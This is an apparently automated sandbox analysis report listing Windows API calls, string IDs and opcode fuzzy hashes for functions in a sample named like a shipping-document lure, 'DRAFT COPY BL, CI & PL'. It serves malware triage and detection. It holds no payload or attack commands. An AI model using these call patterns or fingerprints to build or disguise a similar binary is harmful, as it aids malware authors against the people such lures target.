                                                                  • Part of subcall function 00931B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00932036,?,00000000,?,?,?,?,009316CB,00000000,?), ref: 00931B9A
                                                                • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 009320D3
                                                                • KillTimer.USER32(-00000001,?,?,?,?,009316CB,00000000,?,?,00931AE2,?,?), ref: 0093216E
                                                                • DestroyAcceleratorTable.USER32(00000000), ref: 0096BCA6
                                                                • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,009316CB,00000000,?,?,00931AE2,?,?), ref: 0096BCD7
                                                                • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,009316CB,00000000,?,?,00931AE2,?,?), ref: 0096BCEE
                                                                • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,009316CB,00000000,?,?,00931AE2,?,?), ref: 0096BD0A
                                                                • DeleteObject.GDI32(00000000), ref: 0096BD1C
                                                                Similarity
                                                                • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                • String ID:
                                                                • API String ID: 641708696-0
                                                                • Opcode ID: 2dc1020e3750d812127a26ed40a6c1bf070159f51d13e78375309eef16b86691
                                                                • Instruction ID: 92cbc413cc9b24851b71b17eac51887ea49daa85bcfe26497a281aa0328891dc
                                                                • Opcode Fuzzy Hash: 2dc1020e3750d812127a26ed40a6c1bf070159f51d13e78375309eef16b86691
                                                                • Instruction Fuzzy Hash: F3617C31128A10DFCB39AF14DE58B3AB7F5FF40312F108529E6428A5B0D774A885EF91
                                                                APIs
                                                                  • Part of subcall function 009325DB: GetWindowLongW.USER32(?,000000EB), ref: 009325EC
                                                                • GetSysColor.USER32(0000000F), ref: 009321D3
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: ColorLongWindow
                                                                • String ID:
                                                                • API String ID: 259745315-0
                                                                • Opcode ID: e7dfe6bf59dca7ffa974093d6618488b07b402deb581561e10d02a3b78bbde86
                                                                • Instruction ID: 75c0ab4d520edf0d3e1e2a288e58ee3d08962d3bdac5ed82bae420e77adeed89
                                                                • Opcode Fuzzy Hash: e7dfe6bf59dca7ffa974093d6618488b07b402deb581561e10d02a3b78bbde86
                                                                • Instruction Fuzzy Hash: 00418231108640EBDB295F68DC98BBA3B69EB06331F144365FE758A1E5D7318C82EF61
                                                                APIs
                                                                • CharLowerBuffW.USER32(?,?,009BF910), ref: 0099A90B
                                                                • GetDriveTypeW.KERNEL32(00000061,009E89A0,00000061), ref: 0099A9D5
                                                                • _wcscpy.LIBCMT ref: 0099A9FF
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: BuffCharDriveLowerType_wcscpy
                                                                • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                • API String ID: 2820617543-1000479233
                                                                • Opcode ID: 90d01ec88cdbabd2b7b5854951a91da1cf1ab3d4903182a739d2b472e80b9346
                                                                • Instruction ID: b439eee030f88e01051bd6aa9f68b1b9bcd69e54c0b4fd98ec9aae44a8df76db
                                                                • Opcode Fuzzy Hash: 90d01ec88cdbabd2b7b5854951a91da1cf1ab3d4903182a739d2b472e80b9346
                                                                • Instruction Fuzzy Hash: 57518A31508301ABCB20EF19C992BAFB7A9FFC4304F154829F895572A2DB719D09CB93
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: __i64tow__itow__swprintf
                                                                • String ID: %.15g$0x%p$False$True
                                                                • API String ID: 421087845-2263619337
                                                                • Opcode ID: 719e0c4ae9663bbb159ab77713469ef829235d453bef25351a6b9479f7e51a43
                                                                • Instruction ID: 19a0a743bf3bc82889c2fb2c154fd99fa64adb28923021c4b5410bf51e567cdb
                                                                • Opcode Fuzzy Hash: 719e0c4ae9663bbb159ab77713469ef829235d453bef25351a6b9479f7e51a43
                                                                • Instruction Fuzzy Hash: D941C571604205AFEB24DF75D852B7673E8EF85300F20486EF94ADB291EA759D058F10
                                                                APIs
                                                                • _memset.LIBCMT ref: 009B716A
                                                                • CreateMenu.USER32 ref: 009B7185
                                                                • SetMenu.USER32(?,00000000), ref: 009B7194
                                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 009B7221
                                                                • IsMenu.USER32(?), ref: 009B7237
                                                                • CreatePopupMenu.USER32 ref: 009B7241
                                                                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 009B726E
                                                                • DrawMenuBar.USER32 ref: 009B7276
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                • String ID: 0$F
                                                                • API String ID: 176399719-3044882817
                                                                • Opcode ID: 5d0a8e30273f5517df9a0a2aad573aef2996f702eb7442810803e87fb327f30b
                                                                • Instruction ID: aaff73384cbd3ad9a3f5f6886e07a6004bb98eff9da220c77575cd5cc9c07c7f
                                                                • Opcode Fuzzy Hash: 5d0a8e30273f5517df9a0a2aad573aef2996f702eb7442810803e87fb327f30b
                                                                • Instruction Fuzzy Hash: 12416B74A15205EFDB20DFA4DA84EEABBB9FF48360F140228F91597361D771A910DFA0
                                                                APIs
                                                                • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 009B755E
                                                                • CreateCompatibleDC.GDI32(00000000), ref: 009B7565
                                                                • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 009B7578
                                                                • SelectObject.GDI32(00000000,00000000), ref: 009B7580
                                                                • GetPixel.GDI32(00000000,00000000,00000000), ref: 009B758B
                                                                • DeleteDC.GDI32(00000000), ref: 009B7594
                                                                • GetWindowLongW.USER32(?,000000EC), ref: 009B759E
                                                                • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 009B75B2
                                                                • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 009B75BE
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                • String ID: static
                                                                • API String ID: 2559357485-2160076837
                                                                • Opcode ID: cc0980b1a978f56ead92da5baf88f613475b240f4b47d8be6c540f7a3814cfa4
                                                                • Instruction ID: 7c15da7982893179607fd5716014b2a328bda64d21b7ebd521ae82478a25e193
                                                                • Opcode Fuzzy Hash: cc0980b1a978f56ead92da5baf88f613475b240f4b47d8be6c540f7a3814cfa4
                                                                • Instruction Fuzzy Hash: B2316C72118218BBDF219FB4DD18FEA7B69EF49730F110325FA15A61A0C771D811EBA4
                                                                APIs
                                                                • _memset.LIBCMT ref: 00956E3E
                                                                  • Part of subcall function 00958B28: __getptd_noexit.LIBCMT ref: 00958B28
                                                                • __gmtime64_s.LIBCMT ref: 00956ED7
                                                                • __gmtime64_s.LIBCMT ref: 00956F0D
                                                                • __gmtime64_s.LIBCMT ref: 00956F2A
                                                                • __allrem.LIBCMT ref: 00956F80
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00956F9C
                                                                • __allrem.LIBCMT ref: 00956FB3
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00956FD1
                                                                • __allrem.LIBCMT ref: 00956FE8
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00957006
                                                                • __invoke_watson.LIBCMT ref: 00957077
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                • String ID:
                                                                • API String ID: 384356119-0
                                                                • Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                                • Instruction ID: 3de9200694381e81a065ca460c2ae758d45ca6b61aefb27a87be144ebf540290
                                                                • Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                                • Instruction Fuzzy Hash: DF711872A00716ABD714EEBADC42B5AB3F8AF45725F108229FC14E72C1E770DE088790
                                                                APIs
                                                                • _memset.LIBCMT ref: 00992542
                                                                • GetMenuItemInfoW.USER32(009F5890,000000FF,00000000,00000030), ref: 009925A3
                                                                • SetMenuItemInfoW.USER32(009F5890,00000004,00000000,00000030), ref: 009925D9
                                                                • Sleep.KERNEL32(000001F4), ref: 009925EB
                                                                • GetMenuItemCount.USER32(?), ref: 0099262F
                                                                • GetMenuItemID.USER32(?,00000000), ref: 0099264B
                                                                • GetMenuItemID.USER32(?,-00000001), ref: 00992675
                                                                • GetMenuItemID.USER32(?,?), ref: 009926BA
                                                                • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00992700
                                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00992714
                                                                • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00992735
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                • String ID:
                                                                • API String ID: 4176008265-0
                                                                • Opcode ID: c415faba97eb15b6fac1b0c1f015312b9d52747f6d8f555a62c4a559a6ac9291
                                                                • Instruction ID: f23ff3e937df01b57587f21405a2b88bec76ab0f7fd719d06c2be7d4ac67a40f
                                                                • Opcode Fuzzy Hash: c415faba97eb15b6fac1b0c1f015312b9d52747f6d8f555a62c4a559a6ac9291
                                                                • Instruction Fuzzy Hash: 2961AAB0914249BFDF21CFA8DD88EBE7BB9EB45344F14056AF842A7290D731AD05DB21
                                                                APIs
                                                                • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 009B6FA5
                                                                • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 009B6FA8
                                                                • GetWindowLongW.USER32(?,000000F0), ref: 009B6FCC
                                                                • _memset.LIBCMT ref: 009B6FDD
                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 009B6FEF
                                                                • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 009B7067
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$LongWindow_memset
                                                                • String ID:
                                                                • API String ID: 830647256-0
                                                                • Opcode ID: 763d9dc3f7fbda89fac4009e0de8dd94c215f6c7e3b7be31d658704123ff6360
                                                                • Instruction ID: ec989e07bcf58df36b253ec3f4a34d1cce71b68f26ad3482f41555fe06a6064c
                                                                • Opcode Fuzzy Hash: 763d9dc3f7fbda89fac4009e0de8dd94c215f6c7e3b7be31d658704123ff6360
                                                                • Instruction Fuzzy Hash: A8617C71904208AFDB10DFA8CD81EEEB7F8EF49710F10015AFA14AB2A1C775AD41DBA0
                                                                APIs
                                                                • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00986BBF
                                                                • SafeArrayAllocData.OLEAUT32(?), ref: 00986C18
                                                                • VariantInit.OLEAUT32(?), ref: 00986C2A
                                                                • SafeArrayAccessData.OLEAUT32(?,?), ref: 00986C4A
                                                                • VariantCopy.OLEAUT32(?,?), ref: 00986C9D
                                                                • SafeArrayUnaccessData.OLEAUT32(?), ref: 00986CB1
                                                                • VariantClear.OLEAUT32(?), ref: 00986CC6
                                                                • SafeArrayDestroyData.OLEAUT32(?), ref: 00986CD3
                                                                • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00986CDC
                                                                • VariantClear.OLEAUT32(?), ref: 00986CEE
                                                                • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00986CF9
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                • String ID:
                                                                • API String ID: 2706829360-0
                                                                • Opcode ID: 1b0310081707f0228b96723a38de25dd1916bb768cd0f44502078ac52158ab24
                                                                • Instruction ID: df71a16e43091d8ddc1ba8635f68ed45ea0dc1d815f69c9adddb89e717ca8510
                                                                • Opcode Fuzzy Hash: 1b0310081707f0228b96723a38de25dd1916bb768cd0f44502078ac52158ab24
                                                                • Instruction Fuzzy Hash: C1418271A141199FCF00EFA8DD58EAEBBB9EF48314F008169E955EB361CB70A945CF90
                                                                APIs
                                                                  • Part of subcall function 00939837: __itow.LIBCMT ref: 00939862
                                                                  • Part of subcall function 00939837: __swprintf.LIBCMT ref: 009398AC
                                                                • CoInitialize.OLE32 ref: 009A8403
                                                                • CoUninitialize.OLE32 ref: 009A840E
                                                                • CoCreateInstance.OLE32(?,00000000,00000017,009C2BEC,?), ref: 009A846E
                                                                • IIDFromString.OLE32(?,?), ref: 009A84E1
                                                                • VariantInit.OLEAUT32(?), ref: 009A857B
                                                                • VariantClear.OLEAUT32(?), ref: 009A85DC
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                • API String ID: 834269672-1287834457
                                                                APIs
                                                                • WSAStartup.WSOCK32(00000101,?), ref: 009A5793
                                                                • inet_addr.WSOCK32(?,?,?), ref: 009A57D8
                                                                • gethostbyname.WSOCK32(?), ref: 009A57E4
                                                                • IcmpCreateFile.IPHLPAPI ref: 009A57F2
                                                                • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 009A5862
                                                                • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 009A5878
                                                                • IcmpCloseHandle.IPHLPAPI(00000000), ref: 009A58ED
                                                                • WSACleanup.WSOCK32 ref: 009A58F3
                                                                Strings
                                                                Similarity
                                                                • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                • String ID: Ping
                                                                • API String ID: 1028309954-2246546115
                                                                APIs
                                                                • SetErrorMode.KERNEL32(00000001), ref: 0099B4D0
                                                                • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0099B546
                                                                • GetLastError.KERNEL32 ref: 0099B550
                                                                • SetErrorMode.KERNEL32(00000000,READY), ref: 0099B5BD
                                                                Strings
                                                                Similarity
                                                                • API ID: Error$Mode$DiskFreeLastSpace
                                                                • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                • API String ID: 4194297153-14809454
                                                                APIs
                                                                  • Part of subcall function 00937DE1: _memmove.LIBCMT ref: 00937E22
                                                                  • Part of subcall function 0098AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0098AABC
                                                                • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00989014
                                                                • GetDlgCtrlID.USER32 ref: 0098901F
                                                                • GetParent.USER32 ref: 0098903B
                                                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 0098903E
                                                                • GetDlgCtrlID.USER32(?), ref: 00989047
                                                                • GetParent.USER32(?), ref: 00989063
                                                                • SendMessageW.USER32(00000000,?,?,00000111), ref: 00989066
                                                                Strings
                                                                Similarity
                                                                • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                • String ID: ComboBox$ListBox
                                                                • API String ID: 1536045017-1403004172
                                                                APIs
                                                                  • Part of subcall function 00937DE1: _memmove.LIBCMT ref: 00937E22
                                                                  • Part of subcall function 0098AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0098AABC
                                                                • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 009890FD
                                                                • GetDlgCtrlID.USER32 ref: 00989108
                                                                • GetParent.USER32 ref: 00989124
                                                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 00989127
                                                                • GetDlgCtrlID.USER32(?), ref: 00989130
                                                                • GetParent.USER32(?), ref: 0098914C
                                                                • SendMessageW.USER32(00000000,?,?,00000111), ref: 0098914F
                                                                Strings
                                                                Similarity
                                                                • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                • String ID: ComboBox$ListBox
                                                                • API String ID: 1536045017-1403004172
                                                                APIs
                                                                • GetParent.USER32 ref: 0098916F
                                                                • GetClassNameW.USER32(00000000,?,00000100), ref: 00989184
                                                                • _wcscmp.LIBCMT ref: 00989196
                                                                • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00989211
                                                                Strings
                                                                Similarity
                                                                • API ID: ClassMessageNameParentSend_wcscmp
                                                                • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                • API String ID: 1704125052-3381328864
                                                                APIs
                                                                • VariantInit.OLEAUT32(?), ref: 009A88D7
                                                                • CoInitialize.OLE32(00000000), ref: 009A8904
                                                                • CoUninitialize.OLE32 ref: 009A890E
                                                                • GetRunningObjectTable.OLE32(00000000,?), ref: 009A8A0E
                                                                • SetErrorMode.KERNEL32(00000001,00000029), ref: 009A8B3B
                                                                • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,009C2C0C), ref: 009A8B6F
                                                                • CoGetObject.OLE32(?,00000000,009C2C0C,?), ref: 009A8B92
                                                                • SetErrorMode.KERNEL32(00000000), ref: 009A8BA5
                                                                • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 009A8C25
                                                                • VariantClear.OLEAUT32(?), ref: 009A8C35
                                                                Similarity
                                                                • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                • String ID:
                                                                • API String ID: 2395222682-0
                                                                APIs
                                                                • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00997A6C
                                                                Similarity
                                                                • API ID: ArraySafeVartype
                                                                • String ID:
                                                                • API String ID: 1725837607-0
                                                                APIs
                                                                • GetCurrentThreadId.KERNEL32 ref: 009911F0
                                                                • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00990268,?,00000001), ref: 00991204
                                                                • GetWindowThreadProcessId.USER32(00000000), ref: 0099120B
                                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00990268,?,00000001), ref: 0099121A
                                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 0099122C
                                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00990268,?,00000001), ref: 00991245
                                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00990268,?,00000001), ref: 00991257
                                                                • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00990268,?,00000001), ref: 0099129C
                                                                • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00990268,?,00000001), ref: 009912B1
                                                                • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00990268,?,00000001), ref: 009912BC
                                                                Similarity
                                                                • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                • String ID:
                                                                • API String ID: 2156557900-0
                                                                APIs
                                                                • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0093FAA6
                                                                • OleUninitialize.OLE32(?,00000000), ref: 0093FB45
                                                                • UnregisterHotKey.USER32(?), ref: 0093FC9C
                                                                • DestroyWindow.USER32(?), ref: 009745D6
                                                                • FreeLibrary.KERNEL32(?), ref: 0097463B
                                                                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00974668
                                                                Strings
                                                                Similarity
                                                                • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                • String ID: close all
                                                                • API String ID: 469580280-3243417748
APIs
• EnumChildWindows.USER32(?,0098A439), ref: 0098A377
Strings
Similarity
• API ID: ChildEnumWindows
• String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
• API String ID: 3555792229-1603158881
APIs
• SetWindowLongW.USER32(?,000000EB), ref: 00932EAE
  • Part of subcall function 00931DB3: GetClientRect.USER32(?,?), ref: 00931DDC
  • Part of subcall function 00931DB3: GetWindowRect.USER32(?,?), ref: 00931E1D
  • Part of subcall function 00931DB3: ScreenToClient.USER32(?,?), ref: 00931E45
• GetDC.USER32 ref: 0096CD32
• SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0096CD45
• SelectObject.GDI32(00000000,00000000), ref: 0096CD53
• SelectObject.GDI32(00000000,00000000), ref: 0096CD68
• ReleaseDC.USER32(?,00000000), ref: 0096CD70
• MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0096CDFB
Strings
Similarity
• API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
• String ID: U
• API String ID: 4009187628-3372436214
APIs
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 009A1A50
• HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 009A1A7C
• InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 009A1ABE
• InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 009A1AD3
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009A1AE0
• HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 009A1B10
• InternetCloseHandle.WININET(00000000), ref: 009A1B57
  • Part of subcall function 009A2483: GetLastError.KERNEL32(?,?,009A1817,00000000,00000000,00000001), ref: 009A2498
  • Part of subcall function 009A2483: SetEvent.KERNEL32(?,?,009A1817,00000000,00000000,00000001), ref: 009A24AD
Strings
Similarity
• API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
• String ID:
• API String ID: 2603140658-3916222277
APIs
• GetModuleFileNameW.KERNEL32(?,?,00000104,?,009BF910), ref: 009A8D28
• FreeLibrary.KERNEL32(00000000,00000001,00000000,?,009BF910), ref: 009A8D5C
• QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 009A8ED6
• SysFreeString.OLEAUT32(?), ref: 009A8F00
Similarity
